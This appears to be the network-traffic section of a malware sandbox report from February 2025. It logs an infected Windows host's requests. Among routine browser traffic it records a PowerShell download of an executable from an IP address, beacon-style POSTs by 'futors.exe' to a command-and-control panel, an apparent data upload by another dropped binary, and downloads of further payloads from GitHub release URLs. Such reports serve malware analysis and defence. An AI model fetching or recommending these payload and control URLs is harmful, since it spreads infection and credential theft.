                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727)
                                                                                              Host: www.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:03 GMT
                                                                                              Expires: -1
                                                                                              Cache-Control: private, max-age=0
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-sjtkYHIKyn9xSh6FtEf0yg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                              Content-Encoding: gzip
                                                                                              Server: gws
                                                                                              Content-Length: 1884
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Set-Cookie: AEC=AVcja2c1diw40PNar7vJ1F2sHwokah1ujk9xLpHLrxJCW774ytChFPODAQ; expires=Tue, 19-Aug-2025 00:34:03 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              172.217.169.78:443
                                                                                              Request
                                                                                              GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=123.0.6312.123&lang=en-US&acceptformat=crx3,puff&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.86.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D2%2526e%253D1 HTTP/2.0
                                                                                              host: clients2.google.com
                                                                                              sec-fetch-site: none
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                              cookie: __Secure-ENID=25.SE=FqFe7UrTzzFPR0IaYsuhGNML1XH-htbGRn0dSMEcfFldrc08ldcRazHN8GZGWbmVFuVsOI2vcDBF9bcc_zkaTICskZXh9eqH4jq9AxT6nwu8iCXpFh2hJ3dFuiu6dKmX4HiNm3rIQi1BdlPVu-RTP-qSptzztOtor9nxszvH3Mqsq9h-Kdr_rnlDqZ_aHUJki6Q-bZLaiBTm
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.google.com/async/ddljson?async=ntp:2
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:443
                                                                                              Request
                                                                                              GET /async/ddljson?async=ntp:2 HTTP/2.0
                                                                                              host: www.google.com
                                                                                              sec-fetch-site: none
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:443
                                                                                              Request
                                                                                              GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
                                                                                              host: www.google.com
                                                                                              x-client-data: CNCIywE=
                                                                                              sec-fetch-site: cross-site
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.google.com/async/newtab_promos
                                                                                              chrome.exe
                                                                                              Remote address:
                                                                                              142.250.200.4:443
                                                                                              Request
                                                                                              GET /async/newtab_promos HTTP/2.0
                                                                                              host: www.google.com
                                                                                              sec-fetch-site: cross-site
                                                                                              sec-fetch-mode: no-cors
                                                                                              sec-fetch-dest: empty
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                              accept-encoding: gzip, deflate, br, zstd
                                                                                              accept-language: en-US,en;q=0.9
                                                                                            • flag-ru
                                                                                              GET
                                                                                              http://185.215.113.16/mine/random.exe
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              185.215.113.16:80
                                                                                              Request
                                                                                              GET /mine/random.exe HTTP/1.1
                                                                                              Host: 185.215.113.16
                                                                                              Connection: Keep-Alive
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:06 GMT
                                                                                              Content-Type: application/octet-stream
                                                                                              Content-Length: 2134016
                                                                                              Last-Modified: Wed, 19 Feb 2025 23:46:05 GMT
                                                                                              Connection: keep-alive
                                                                                              ETag: "67b66d3d-209000"
                                                                                              Accept-Ranges: bytes
                                                                                            • flag-us
                                                                                              DNS
                                                                                              yahoo.com
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              yahoo.com
                                                                                              IN MX
                                                                                              Response
                                                                                              yahoo.com
                                                                                              IN MX
                                                                                              mta6.am0.yahoodns.net
                                                                                              yahoo.com
                                                                                              IN MX
                                                                                              mta7.am0.yahoodns.net
                                                                                              yahoo.com
                                                                                              IN MX
                                                                                              mta5.am0.yahoodns.net
                                                                                            • flag-us
                                                                                              DNS
                                                                                              mta6.am0.yahoodns.net
                                                                                              powershell.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              Response
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              67.195.204.73
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              67.195.228.110
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              67.195.204.74
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              98.136.96.91
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              67.195.228.94
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              67.195.204.79
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              67.195.228.106
                                                                                              mta6.am0.yahoodns.net
                                                                                              IN A
                                                                                              98.136.96.77
                                                                                            • flag-us
                                                                                              DNS
                                                                                              youtube.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              youtube.com
                                                                                              IN A
                                                                                              Response
                                                                                              youtube.com
                                                                                              IN A
                                                                                              142.250.179.238
                                                                                            • flag-us
                                                                                              DNS
                                                                                              spocs.getpocket.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              spocs.getpocket.com
                                                                                              IN A
                                                                                              Response
                                                                                              spocs.getpocket.com
                                                                                              IN CNAME
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              34.117.188.166
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              142.250.179.238:443
                                                                                              Request
                                                                                              GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                                                                                              host: youtube.com
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                                                                              accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              accept-language: en-US,en;q=0.5
                                                                                              accept-encoding: gzip, deflate, br
                                                                                              upgrade-insecure-requests: 1
                                                                                              sec-fetch-dest: document
                                                                                              sec-fetch-mode: navigate
                                                                                              sec-fetch-site: none
                                                                                              sec-fetch-user: ?1
                                                                                              te: trailers
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              142.250.179.238:443
                                                                                              Request
                                                                                              GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
                                                                                              host: www.youtube.com
                                                                                              user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                                                                              accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                              accept-language: en-US,en;q=0.5
                                                                                              accept-encoding: gzip, deflate, br
                                                                                              upgrade-insecure-requests: 1
                                                                                              sec-fetch-dest: document
                                                                                              sec-fetch-mode: navigate
                                                                                              sec-fetch-site: none
                                                                                              sec-fetch-user: ?1
                                                                                              te: trailers
                                                                                            • flag-us
                                                                                              DNS
                                                                                              youtube.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              youtube.com
                                                                                              IN A
                                                                                              Response
                                                                                              youtube.com
                                                                                              IN A
                                                                                              142.250.179.238
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              Response
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              34.117.188.166
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              Response
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              IN A
                                                                                              34.160.144.191
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              IN AAAA
                                                                                              Response
                                                                                              prod.content-signature-chains.prod.webservices.mozgcp.net
                                                                                              IN AAAA
                                                                                              2600:1901:0:92a9::
                                                                                            • flag-us
                                                                                              DNS
                                                                                              youtube.com
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              youtube.com
                                                                                              IN AAAA
                                                                                              Response
                                                                                              youtube.com
                                                                                              IN AAAA
                                                                                              2a00:1450:4009:81d::200e
                                                                                            • flag-us
                                                                                              DNS
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              firefox.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              prod.ads.prod.webservices.mozgcp.net
                                                                                              IN AAAA
                                                                                              Response
                                                                                            • flag-us
                                                                                              DNS
                                                                                              Request
                                                                                              www.google.com
                                                                                              IN AAAA
                                                                                              Response
                                                                                              www.google.com
                                                                                              IN AAAA
                                                                                              2a00:1450:4009:822::2004
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 4
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:10 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 158
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:12 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:22 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:27 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:31 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:36 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:40 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:45 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:49 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.209/Di0Her478/index.php
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              185.215.113.209:80
                                                                                              Request
                                                                                              POST /Di0Her478/index.php HTTP/1.1
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Host: 185.215.113.209
                                                                                              Content-Length: 32
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                                              Date: Thu, 20 Feb 2025 00:34:58 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: keep-alive
                                                                                            • flag-ru
                                                                                              POST
                                                                                              http://185.215.113.115/c4becf79229cb002.php
                                                                                              ee1401f004.exe
                                                                                              Remote address:
                                                                                              185.215.113.115:80
                                                                                              Request
                                                                                              POST /c4becf79229cb002.php HTTP/1.1
                                                                                              Content-Type: multipart/form-data; boundary=----AEBAKJDGHIIJJKFHCFCA
                                                                                              Host: 185.215.113.115
                                                                                              Content-Length: 363
                                                                                              Connection: Keep-Alive
                                                                                              Cache-Control: no-cache
                                                                                              Response
                                                                                              HTTP/1.1 200 OK
                                                                                              Date: Thu, 20 Feb 2025 00:34:13 GMT
                                                                                              Server: Apache/2.4.41 (Ubuntu)
                                                                                              Content-Length: 0
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                            • flag-us
                                                                                              DNS
                                                                                              github.com
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              8.8.8.8:53
                                                                                              Request
                                                                                              github.com
                                                                                              IN A
                                                                                              Response
                                                                                              github.com
                                                                                              IN A
                                                                                              20.26.156.215
                                                                                            • flag-gb
                                                                                              GET
                                                                                              https://github.com/legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exe
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              20.26.156.215:443
                                                                                              Request
                                                                                              GET /legendary99999/gdsgdsggds/releases/download/dsffdsdfs/trano1221.exe HTTP/1.1
                                                                                              Host: github.com
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Server: GitHub.com
                                                                                              Date: Thu, 20 Feb 2025 00:34:17 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/931090743/fe2351f3-d512-4704-a31e-e7267ddf3e14?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003417Z&X-Amz-Expires=300&X-Amz-Signature=66a4490c649969e8e57e49179dcb3d281f5845caaa83cbf7476823ad7406f82a&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dtrano1221.exe&response-content-type=application%2Foctet-stream
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                                                              Content-Length: 0
                                                                                              X-GitHub-Request-Id: 5849:28646A:403531:50375F:67B67888
                                                                                            • [GB]
                                                                                              GET
                                                                                              https://github.com/legendary99999/fdsfsdfdsfds/releases/download/dfsfdsfdsdsf/con12312211221.exe
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              20.26.156.215:443
                                                                                              Request
                                                                                              GET /legendary99999/fdsfsdfdsfds/releases/download/dfsfdsfdsdsf/con12312211221.exe HTTP/1.1
                                                                                              Host: github.com
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
                                                                                              Server: GitHub.com
                                                                                              Date: Thu, 20 Feb 2025 00:34:27 GMT
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                              Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/932430920/f3727065-e97b-4230-9333-63b156bde389?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250220%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250220T003427Z&X-Amz-Expires=300&X-Amz-Signature=d0a095dda97f3ae2552aa4991862c4e6a4469581f8b8e7c7c9530a03e2528eb7&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dcon12312211221.exe&response-content-type=application%2Foctet-stream
                                                                                              Cache-Control: no-cache
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                              X-Frame-Options: deny
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-XSS-Protection: 0
                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                              Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                                                                                              Content-Length: 0
                                                                                              X-GitHub-Request-Id: 5849:28646A:403960:503CE6:67B67889
                                                                                            • [GB]
                                                                                              GET
                                                                                              https://github.com/legendary99999/saffsfsd/releases/download/dsffdssff/12321321.exe
                                                                                              futors.exe
                                                                                              Remote address:
                                                                                              20.26.156.215:443
                                                                                              Request
                                                                                              GET /legendary99999/saffsfsd/releases/download/dsffdssff/12321321.exe HTTP/1.1
                                                                                              Host: github.com
                                                                                              Response
                                                                                              HTTP/1.1 302 Found
